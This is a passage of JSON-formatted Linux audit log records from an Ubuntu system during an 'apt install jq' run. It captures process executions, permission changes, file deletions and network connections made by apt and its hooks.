"[ ! -f /usr/lib/ubuntu-advantage/apt-esm-hook ] || /usr/lib/ubuntu-advantage/apt-esm-hook pre-invoke || true"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.803,
"ppid": 7575
}
}
{
"ID": "1632470474.809:382",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7588,
"pid": 7589,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt-esm-hook",
"exe": "/usr/lib/ubuntu-advantage/apt-esm-hook",
"key": "rootcmd",
"ARGV": [
"0x557261ed56d0",
"0x557261ed5730",
"0x557261ed5748",
"0x7f29b5076850"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"/usr/lib/ubuntu-advantage/apt-esm-hook",
"pre-invoke"
]
},
"CWD": {
"cwd": "/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/ubuntu-advantage/apt-esm-hook",
"inode": 793476,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/lib/ubuntu-advantage/apt-esm-hook",
"pre-invoke"
]
},
"PARENT_INFO": {
"ARGV": [
"sh",
"-c",
"[ ! -f /usr/lib/ubuntu-advantage/apt-esm-hook ] || /usr/lib/ubuntu-advantage/apt-esm-hook pre-invoke || true"
],
"launch_time": 1632470474.809,
"ppid": 7587
}
}
{
"ID": "1632470474.813:383",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 92,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "perm_mod",
"ARGV": [
"0x564c550c0230",
"0x69",
"0x0",
"0x7f37c18d2ac0"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/apt/archives/partial",
"inode": 138208,
"dev": "fd:00",
"mode": "0o40700",
"ouid": 105,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470474.813:384",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "perm_mod",
"ARGV": [
"0x564c550c0230",
"0x1c0",
"0x0",
"0x7f37c18d2ac0"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/apt/archives/partial",
"inode": 138208,
"dev": "fd:00",
"mode": "0o40700",
"ouid": 105,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470474.813:385",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 92,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "perm_mod",
"ARGV": [
"0x564c550d5820",
"0x69",
"0x0",
"0x7f37c18d2ac0"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/apt/lists/auxfiles",
"inode": 138223,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 105,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470474.813:386",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "perm_mod",
"ARGV": [
"0x564c550d5820",
"0x1ed",
"0x0",
"0x7f37c18d2ac0"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/apt/lists/auxfiles",
"inode": 138223,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 105,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470474.825:387",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7590,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "http",
"exe": "/usr/lib/apt/methods/http",
"key": "rootcmd",
"ARGV": [
"0x564c55032a10",
"0x7ffe41acc8c0",
"0x7ffe41acdc68",
"0x7f37c18d2ac0"
]
},
"EXECVE": {
"argc": 1,
"ARGV": [
"/usr/lib/apt/methods/http"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/apt/methods/http",
"inode": 787708,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/lib/apt/methods/http"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470474.841:388",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7591,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "sh",
"exe": "/usr/bin/dash",
"key": "rootcmd",
"ARGV": [
"0x7f37c1d66b70",
"0x7ffe41acd020",
"0x564c5505b840",
"0x564c5502a62f"
]
},
"EXECVE": {
"argc": 3,
"ARGV": [
"/bin/sh",
"-c",
"[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/bin/sh",
"inode": 787014,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/bin/sh",
"-c",
"[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470474.845:389",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7591,
"pid": 7592,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "snap",
"exe": "/usr/bin/snap",
"key": "software_mgmt",
"ARGV": [
"0x56153c93b758",
"0x56153c93b7c0",
"0x56153c93b9b8",
"0x7f25df0b6850"
]
},
"EXECVE": {
"argc": 3,
"ARGV": [
"/usr/bin/snap",
"advise-snap",
"--from-apt"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/snap",
"inode": 787492,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/snap",
"advise-snap",
"--from-apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"-c",
"[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
],
"launch_time": 1632470474.841,
"ppid": 7575
}
}
{
"ID": "1632470474.853:390",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7591,
"pid": 7592,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "snap",
"exe": "/snap/snapd/12704/usr/bin/snap",
"key": "rootcmd",
"ARGV": [
"0xc00003fe00",
"0xc00023b020",
"0xc0001147e0",
"0x0"
]
},
"EXECVE": {
"argc": 3,
"ARGV": [
"/usr/bin/snap",
"advise-snap",
"--from-apt"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/snap/snapd/current/usr/bin/snap",
"inode": 99,
"dev": "07:02",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/snap",
"advise-snap",
"--from-apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"-c",
"[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
],
"launch_time": 1632470474.841,
"ppid": 7575
}
}
{
"ID": "1632470474.869:391",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7600,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "sh",
"exe": "/usr/bin/dash",
"key": "rootcmd",
"ARGV": [
"0x7f37c1d66b70",
"0x7ffe41acd020",
"0x564c5505b840",
"0x564c5502a62f"
]
},
"EXECVE": {
"argc": 3,
"ARGV": [
"/bin/sh",
"-c",
"[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/bin/sh",
"inode": 787014,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/bin/sh",
"-c",
"[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470474.873:392",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7600,
"pid": 7601,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "snap",
"exe": "/usr/bin/snap",
"key": "software_mgmt",
"ARGV": [
"0x55c5aed00758",
"0x55c5aed007c0",
"0x55c5aed009b8",
"0x7fd0f7164850"
]
},
"EXECVE": {
"argc": 3,
"ARGV": [
"/usr/bin/snap",
"advise-snap",
"--from-apt"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/snap",
"inode": 787492,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/snap",
"advise-snap",
"--from-apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"-c",
"[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
],
"launch_time": 1632470474.869,
"ppid": 7575
}
}
{
"ID": "1632470474.881:393",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7600,
"pid": 7601,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "snap",
"exe": "/snap/snapd/12704/usr/bin/snap",
"key": "rootcmd",
"ARGV": [
"0xc00003fe00",
"0xc00023afe0",
"0xc0001147e0",
"0x0"
]
},
"EXECVE": {
"argc": 3,
"ARGV": [
"/usr/bin/snap",
"advise-snap",
"--from-apt"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/snap/snapd/current/usr/bin/snap",
"inode": 99,
"dev": "07:02",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/snap",
"advise-snap",
"--from-apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"-c",
"[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
],
"launch_time": 1632470474.869,
"ppid": 7575
}
}
{
"ID": "1632470476.897:394",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 105,
"suid": 0,
"fsuid": 105,
"egid": 65534,
"sgid": 0,
"fsgid": 65534,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x564c5502a7a0",
"0x7f37c1cad377",
"0x64",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/apt/archives/partial/",
"inode": 138208,
"dev": "fd:00",
"mode": "0o40700",
"ouid": 105,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/apt/archives/partial/.apt-acquire-privs-test.fQWp7Z",
"inode": 133236,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 105,
"ogid": 65534,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470476.901:395",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 105,
"suid": 0,
"fsuid": 105,
"egid": 65534,
"sgid": 0,
"fsgid": 65534,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x564c5502a7a0",
"0x7f37c1cad377",
"0x64",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/apt/archives/partial/",
"inode": 138208,
"dev": "fd:00",
"mode": "0o40700",
"ouid": 105,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/apt/archives/partial/.apt-acquire-privs-test.HPGoYW",
"inode": 133236,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 105,
"ogid": 65534,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470476.901:396",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 105,
"suid": 0,
"fsuid": 105,
"egid": 65534,
"sgid": 0,
"fsgid": 65534,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x564c5502a7a0",
"0x7f37c1cad377",
"0x64",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/apt/archives/partial/",
"inode": 138208,
"dev": "fd:00",
"mode": "0o40700",
"ouid": 105,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/apt/archives/partial/.apt-acquire-privs-test.Xu1Kf0",
"inode": 133236,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 105,
"ogid": 65534,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470476.905:397",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7609,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "http",
"exe": "/usr/lib/apt/methods/http",
"key": "rootcmd",
"ARGV": [
"0x564c550dcc40",
"0x7ffe41acccc0",
"0x7ffe41acdc68",
"0x7f37c18d2ac0"
]
},
"EXECVE": {
"argc": 1,
"ARGV": [
"/usr/lib/apt/methods/http"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/apt/methods/http",
"inode": 787708,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/lib/apt/methods/http"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470476.925:398",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 42,
"success": "yes",
"exit": 0,
"items": 0,
"ppid": 7575,
"pid": 7609,
"auid": 1000,
"uid": 105,
"gid": 65534,
"euid": 105,
"suid": 105,
"fsuid": 105,
"egid": 65534,
"sgid": 65534,
"fsgid": 65534,
"tty": "pts0",
"ses": 3,
"comm": "http",
"exe": "/usr/lib/apt/methods/http",
"key": "network_connect_4",
"ARGV": [
"0x3",
"0x7fff7435fbf4",
"0x10",
"0x7fc8890ad770"
]
},
"SOCKADDR": [
{
"saddr": "%02%00%005%7f%00%005%00%00%00%00%00%00%00%00"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/lib/apt/methods/http"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470476.941:399",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 42,
"success": "yes",
"exit": 0,
"items": 0,
"ppid": 7575,
"pid": 7609,
"auid": 1000,
"uid": 105,
"gid": 65534,
"euid": 105,
"suid": 105,
"fsuid": 105,
"egid": 65534,
"sgid": 65534,
"fsgid": 65534,
"tty": "pts0",
"ses": 3,
"comm": "http",
"exe": "/usr/lib/apt/methods/http",
"key": "network_connect_4",
"ARGV": [
"0x3",
"0x7fc8889fe4d4",
"0x10",
"0x7fff7435de14"
]
},
"SOCKADDR": [
{
"saddr": "%02%00%005%7f%00%005%00%00%00%00%00%00%00%00"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/lib/apt/methods/http"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470476.965:400",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 42,
"success": "yes",
"exit": 0,
"items": 0,
"ppid": 7575,
"pid": 7609,
"auid": 1000,
"uid": 105,
"gid": 65534,
"euid": 105,
"suid": 105,
"fsuid": 105,
"egid": 65534,
"sgid": 65534,
"fsgid": 65534,
"tty": "pts0",
"ses": 3,
"comm": "http",
"exe": "/usr/lib/apt/methods/http",
"key": "network_connect_4",
"ARGV": [
"0x3",
"0x5650c4dc08e0",
"0x10",
"0x7fff7435f6a0"
]
},
"SOCKADDR": [
{
"saddr": "%02%00%00P%2b%ff%a6%fe%00%00%00%00%00%00%00%00"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/lib/apt/methods/http"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.141:401",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 94,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "perm_mod",
"ARGV": [
"0x564c5510bf80",
"0x0",
"0x0",
"0x7f37c18d2ac0"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/apt/archives/partial/libonig5_6.9.4-1_amd64.deb",
"inode": 133236,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 105,
"ogid": 65534,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470477.141:402",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "perm_mod",
"ARGV": [
"0x564c5510bf80",
"0x1a4",
"0x7ffe41acca30",
"0x7f37c18d2ac0"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/apt/archives/partial/libonig5_6.9.4-1_amd64.deb",
"inode": 133236,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
